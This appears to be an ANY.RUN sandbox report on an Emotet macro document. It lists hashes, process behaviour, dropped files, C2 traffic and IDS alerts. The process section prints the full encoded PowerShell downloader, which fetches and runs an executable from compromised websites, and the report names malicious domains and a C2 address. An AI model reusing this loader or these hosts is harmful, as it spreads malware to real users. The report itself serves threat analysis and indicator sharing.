analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IZM-010120 ZHN-011720.doc

Full analysis: https://app.any.run/tasks/d4d2d6e0-f764-4275-baae-1cc09629afc8
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2020, 21:52:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
opendir
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Qui., Author: Mathis Perez, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 16:20:00 2020, Last Saved Time/Date: Fri Jan 17 16:20:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 31, Security: 0
MD5:

0CA2A75AC22AE8BC4F913EE4A531F3A9

SHA1:

658B70FD793A9317D00C744F2412387A7E64C942

SHA256:

88067E56E4765755590FC617A21D46E45F6EBADCAA14ED8377715C43C4ECD3AB

SSDEEP:

6144:o0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+Bzo/Z2K4w1:o0E3dxtR/iU9mvUPBzm2K4w1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 416.exe (PID: 2572)
      • serialfunc.exe (PID: 1932)
      • serialfunc.exe (PID: 2304)
      • 416.exe (PID: 3352)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 2744)
    • Emotet process was detected

      • 416.exe (PID: 2572)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 1932)
    • EMOTET was detected

      • serialfunc.exe (PID: 1932)
    • Connects to CnC server

      • serialfunc.exe (PID: 1932)
  • SUSPICIOUS

    • PowerShell script executed

      • Powershell.exe (PID: 2744)
    • Executable content was dropped or overwritten

      • 416.exe (PID: 2572)
      • Powershell.exe (PID: 2744)
    • Executed via WMI

      • Powershell.exe (PID: 2744)
    • Creates files in the user directory

      • Powershell.exe (PID: 2744)
    • Starts itself from another location

      • 416.exe (PID: 2572)
    • Connects to server without host name

      • serialfunc.exe (PID: 1932)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1404)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1404)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Qui.
Subject: -
Author: Mathis Perez
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:17 16:20:00
ModifyDate: 2020:01:17 16:20:00
Pages: 2
Words: 5
Characters: 31
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 35
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 416.exe no specs #EMOTET 416.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
1404"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\IZM-010120 ZHN-011720.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2744Powershell -w hidden -en JABUAHEAcABrAGUAdgB1AGUAcQBuAHQAcwB4AD0AJwBIAHcAZAB1AG8AYwB4AHQAbwAnADsAJABLAHcAcgBhAHUAbgBpAHEAcwBlAHYAcQBoACAAPQAgACcANAAxADYAJwA7ACQAQQBhAGQAegBqAHUAbABkAHIAPQAnAFAAZABxAHMAYgBuAGEAdgBsAGkAbQB4AHkAJwA7ACQASgB4AHMAZgB5AHEAcgB6AGkAdwBpAGQAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASwB3AHIAYQB1AG4AaQBxAHMAZQB2AHEAaAArACcALgBlAHgAZQAnADsAJABRAHYAdgB4AGIAegBlAG8AdQBkAG4APQAnAFgAbABlAG4AdABhAG8AcQB4AGoAJwA7ACQARwBnAGQAZwBlAG8AdgBnAG8AeABvAGIAZQA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AEUAYgBjAEwASQBlAE4AdAA7ACQASgB6AGkAbgB0AG0AagBvAGQAPQAnAGgAdAB0AHAAOgAvAC8AawBpAHoAaQBsAHQAZQBwAGUAYQBrAHkAdQB6AHIAZQBoAGEAYgBpAGwAaQB0AGEAcwB5AG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgA5AG4AMgAvACoAaAB0AHQAcAA6AC8ALwBzAGkAdABlAHMAZQB0AHUAcAAuAGMAaQBuAGQAeQBkAG8AbgBvAHYAYQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA4ADEAeQBuAGcAbABnAC8AKgBoAHQAdABwAHMAOgAvAC8AagBhAGIAZQByAGUAdgBlAG4AdABzAC4AYwBvAG0ALwB5ADQAOABoAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcABkAGkAbgBoAHYAaQB2AGkAZQB0AHQAZQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcAB3AGgAbQA2AHAALwAqAGgAdAB0AHAAcwA6AC8ALwBtAGEAcgBzAGgAYQBsAGcAcgBvAHUAcAAuAG8AcgBnAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBkAGgAMQAvACcALgAiAFMAcABgAGwAaQBUACIAKAAnACoAJwApADsAJABOAHAAbwB5AG4AZABlAG4AdwA9ACcASAB1AG0AdgBrAHAAdwBvAG4AegBxACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGUAbgBrAGMAeQB0AHoAeQBwAHQAIABpAG4AIAAkAEoAegBpAG4AdABtAGoAbwBkACkAewB0AHIAeQB7ACQARwBnAGQAZwBlAG8AdgBnAG8AeABvAGIAZQAuACIAZABgAE8AdwBuAEwATwBBAEQARgBgAGkAbABlACIAKAAkAEcAZQBuAGsAYwB5AHQAegB5AHAAdAAsACAAJABKAHgAcwBmAHkAcQByAHoAaQB3AGkAZABnACkAOwAkAEQAegBkAHkAeAB3AHMAbAB6AHIAbgBrAHAAPQAnAFoAaQB6AG8AdAB2AHgAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQASgB4AHMAZgB5AHEAcgB6AGkAdwBpAGQAZwApAC4AIgBMAGUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAzADcAOQA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAEEAUgB0ACIAKAAkAEoAeABzAGYAeQBxAHIAegBpAHcAaQBkAGcAKQA7ACQAQgB1AGkAZwB4AHMAcAB2AD0AJwBHAHAAegBsAGUAaABkAHoAbAB1AGEAcQBwACcAOwBiAHIAZQBhAGsAOwAkAEMAZABkAGYAZwB4AHQAdAB2AHEAcQBxAGsAPQAnAEEAdQBzAHoAYwBrAG8AaAByAHEAcABnACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAbABmAGQAZwB1AHAAbABwAGkAPQAnAFYAZAB1AG8AcQBzAGoAdAB1AGYAeAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3352"C:\Users\admin\416.exe" C:\Users\admin\416.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2572--afcc44f7C:\Users\admin\416.exe
416.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2304"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe416.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1932--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Version:
1, 0, 0, 1
Total events
2 232
Read events
1 406
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
1404WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA850.tmp.cvr
MD5:
SHA256:
1404WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF89D38A9DBF0ACD74.TMP
MD5:
SHA256:
2744Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VFS7PRUCC8JDCK4WFVZU.temp
MD5:
SHA256:
1404WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8B378DCC62035BBABEF8B1C2A131A338
SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275
2744Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2744Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b39b.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1404WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$M-010120 ZHN-011720.docpgc
MD5:86ECAB6E1781FD7AC5CDABDEF8FF701B
SHA256:FA056825C95B2D53DC70AC4BC6931F9A0725A1F0E806EF3A188AB16E93A11E5A
1404WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:BB6289B2CB9AC9990ECC9CECE8BF7D99
SHA256:1580E5C754491017850208ECFC845135CC8EAEDEA3BFA72814A2C8C688621FD0
2744Powershell.exeC:\Users\admin\416.exeexecutable
MD5:A8EA414F6D56CE449E6B586CEF0BFD78
SHA256:64773AB56594C566D4DA54DC3D938E928CB19F9C15248F5BB27E66E33B016131
2572416.exeC:\Users\admin\AppData\Local\serialfunc\serialfunc.exeexecutable
MD5:A8EA414F6D56CE449E6B586CEF0BFD78
SHA256:64773AB56594C566D4DA54DC3D938E928CB19F9C15248F5BB27E66E33B016131
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1932
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/3raPeEHaEThH
US
binary
132 b
malicious
2744
Powershell.exe
GET
200
185.46.54.218:80
http://kiziltepeakyuzrehabilitasyon.com/wp-includes/69n2/
TR
executable
710 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1932
serialfunc.exe
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
2744
Powershell.exe
185.46.54.218:80
kiziltepeakyuzrehabilitasyon.com
CND Medya Reklam ve Internet Hizmetleri Tic. Ltd. Sti.
TR
malicious

DNS requests

Domain
IP
Reputation
kiziltepeakyuzrehabilitasyon.com
  • 185.46.54.218
malicious

Threats

PID
Process
Class
Message
2744
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2744
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2744
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1932
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
1932
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
1932
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1 ETPRO signatures available at the full report
No debug info